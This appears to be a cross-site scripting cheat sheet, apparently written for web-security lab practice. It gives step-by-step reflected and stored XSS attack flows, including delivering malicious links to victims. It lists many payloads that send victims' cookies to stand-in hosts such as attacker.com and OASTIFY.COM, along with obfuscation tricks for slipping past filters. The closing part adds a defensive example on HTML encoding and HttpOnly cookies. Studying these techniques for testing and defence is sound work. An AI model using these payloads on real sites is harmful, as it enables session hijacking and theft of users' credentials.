XSS

Reflected:

  • Identify user input fields:

    • Find locations where the server reflects user input in the HTTP response. This could be search fields, form submissions, or URL query parameters.

  • Probe with XSS payloads:

    • Inject simple XSS payloads like:

    • If the input is reflected unsanitized in the HTML response, the payload will be executed in the victim's browser.

  • Craft a targeted payload:

    • Once you’ve verified reflection, modify the script to achieve something malicious, such as:

      • Stealing cookies with <script>document.location='https://attacker.com?cookie='+document.cookie</script>.

  • Deliver payload:

    • Share the malicious link via email, chat, or any other method. When a victim clicks the link, the XSS payload is executed.

Stored:

  1. Identify input fields that store data:

    • Look for areas where user data is stored and reflected back later, such as comment sections, user profiles, or message boards.

  2. Test with XSS payload:

    • Submit an XSS payload like:

      • <script>alert('XSS')</script> in a comment or profile field.

    • If the payload is stored and reflected unsanitized in the webpage, the script will execute when another user views it.

  3. Create a malicious payload:

    • Use JavaScript to steal session tokens, redirect users, or perform other harmful actions.

  4. Wait for victim interaction:

    • Once stored, any user who accesses the page will trigger the stored XSS attack.

Common attack vectors:

  • URL parameters (for reflected XSS).

  • Comment sections, user profile pages, or message boards (for stored XSS).

Payloads:

Basic payloads

<img src=1 onerror=alert(1)>

"><svg><animatetransform onbegin=alert(1)>

<>\'\"<script>{{7*7}}$(alert(1)}"-prompt(69)-"fuzzer

Testing allowed tags:

  1. Intruder tag <§§> with

  2. Intruder <allowed-tag%20§§=1>

Custom tags allowed

Note: The custom tag with the ID x contains an onfocus event handler that triggers document.location. The hash (#) character at the end of the URL focuses this element as soon as the page loads, so the handler fires without any user interaction. Host the payload script on the exploit server inside script tags and send it to the victim.

<script>
location = 'https://TARGET.net/?search=<xss+id=x+onfocus=document.location='https://OASTIFY.COM/?c='+document.cookie tabindex=1>#x';
</script>

search=<xss+id=x+onfocus=alert(document.cookie) tabindex=1>#x';
search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';

//Encoded
<script>
location = 'https://TARGET.net/?search=%3Cxss+id%3Dx+onfocus%3Ddocument.location%3D%27https%3A%2F%2FOASTIFY.COM%2F%3Fc%3D%27%2Bdocument.cookie%20tabindex=1%3E#x';
</script>

SVG payload with animatetransform

<iframe src="https://TARGET.net/?search="><svg><animatetransform onbegin=document.location='https://OASTIFY.COM/?cookies='+document.cookie;>">
</iframe>

Protocol assignment inside payload

<script>location.protocol='javascript';</script>#%0adocument.location='http://OASTIFY.COM/?p='+document.cookie//&context=html

Autorun with onfocus

<script>
location = 'https://TARGET.net/?search=<xss+id=x+onfocus=document.location='https://OASTIFY.COM/?c='+document.cookie tabindex=1>#x';
</script>

Onhashchange

<iframe src="https://TARGET.net/#" onload="document.location='http://OASTIFY.COM/?cookies='+document.cookie"></iframe>

Onresize

<iframe src="https://0ac2003803e52c8e80b3309c00fc00a0.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>

decoded
search="><body onresize=print()>" onload=this.style.width='100px'>

</script><script>document.location="https://OASTIFY.COM/?cookie="+document.cookie</script>

<script>
location = "https://TARGET.net/?search=</ScRiPt ><img src=a onerror=document.location="https://OASTIFY.COM/?biscuit="+document.cookie>"
</script>

Input value inside JS backticks

${alert(document.cookie)}

Escaping quote input

\';document.location=`https://OASTIFY.COM/?BackTicks=`+document.cookie;//

XSS WAF bypass

https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/

The web application has a filter that blocks the string "document.cookie" in any user input. In this case, JavaScript global variables can be used to bypass it. There are many ways to access document.cookie through the window or self object; for example, window["document"]["cookie"] will not be blocked.

window["document"]["cookie"]
window["alert"](window["document"]["cookie"]);    // = alert(document.cookie)
fetch(`https://OASTIFY.COM/?jsonc=` + window["document"]["cookie"])

More complex techniques

//Concatenation
//alert(document.cookie);
self["ale"+"rt"](self["doc"+"ument"]["coo"+"kie"])


//Hex representation
//alert(document.cookie)
self["\x61\x6c\x65\x72\x74"](
    self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
        ["\x63\x6f\x6f\x6b\x69\x65"]
)


//eval + atob

self["eval"](
    self["atob"](
    "base64payload"
    )
)


//jQuery
self["$"]["globalEval"]("alert(1)");
self["\x24"]
["\x67\x6c\x6f\x62\x61\x6c\x45\x76\x61\x6c"]
("\x61\x6c\x65\x72\x74\x28\x31\x29");


//Object.keys Iteration
Object.keys(self)                   // returns the names of the global properties, by index
Object.keys(self)[5]                // e.g. "alert" (the index varies by environment)
self[Object.keys(self)[5]]("foo")   // = alert("foo")
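The filter bypasses above, and the reflected and stored flows at the top of the page, share one root cause: untrusted input reaching the page without context-aware output encoding. The following is an added example (not from these notes or the linked article) that runs the page's own payload variants through the kind of substring blocklist described, and then through the HTML encoding that actually removes the issue; the sample inputs are constructed from the payloads listed on this page.

```javascript
// Added example: why a "document.cookie" blocklist fails, and what the real
// control looks like. Sample inputs below are constructed from this page.

// The filter the page describes: reject input containing a fixed substring.
function naiveBlocklist(input) {
  return !/document\.cookie/i.test(input); // true = accepted
}

// Constructed samples: the page's global-variable variants beside a plain
// reference. Only the plain one contains the literal substring.
const BYPASS_SAMPLES = [
  'self["doc"+"ument"]["coo"+"kie"]',
  'window["document"]["cookie"]',
  'self["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]',
  'document.cookie',
];

function blocklistResults() {
  return BYPASS_SAMPLES.map(naiveBlocklist); // [true, true, true, false]
}

// The defensive control: encode every character that can open or close
// markup in an HTML text or attribute context before the value is placed in
// the response. Obfuscating the JavaScript inside a tag no longer matters,
// because the tag itself never becomes markup.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '`': '&#x60;',
};
function encodeForHtml(input) {
  return String(input).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed samples taken from the "Basic payloads" list on this page.
const PAGE_PAYLOADS = [
  '<img src=1 onerror=alert(1)>',
  '"><svg><animatetransform onbegin=alert(1)>',
];

function encodedPayloads() {
  return PAGE_PAYLOADS.map(encodeForHtml);
}

// True if a string still contains an unencoded tag or attribute delimiter.
function stillContainsMarkup(s) {
  return /[<>"'`]/.test(s);
}
```

Cookies flagged HttpOnly are not readable through document.cookie at all, regardless of how the reference is spelled, so that flag removes the cookie-theft outcome even where encoding has been missed.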
